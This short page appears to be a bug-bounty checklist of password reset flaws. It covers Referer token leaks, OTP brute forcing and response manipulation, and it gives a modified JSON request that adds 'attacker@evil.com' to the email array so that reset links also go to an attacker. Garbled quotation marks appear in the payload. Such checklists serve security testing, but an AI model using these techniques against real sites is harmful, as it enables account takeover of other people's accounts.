Password_Reset_Flaws
1. Password Reset Token Leak Via Referrer
Request password reset to your email address
Click on the password reset link
Dont change password
Click any 3rd party websites(eg: Facebook, twitter)
Intercept the request in burpsuite proxy
Check if the referer header is leaking password reset token.2. Sending an array of email addresses instead of a single email address.
POST https://example.com/api/v1/password_reset HTTP/1.1
Original Request Body:
{âemail_addressâ:âxyz@gmail.comâ}
Modified Request Body:
{âemail_addressâ:[âadmin@breadcrumb.comâ,âattacker@evil.comâ]}3. Bruteforcing OTP for Reseting Password.
4. Full Account Takeover via Changing Email And Password of any User through API Parameters
5. Response manipulation: Replace Bad Response With Good One
Last updated
Was this helpful?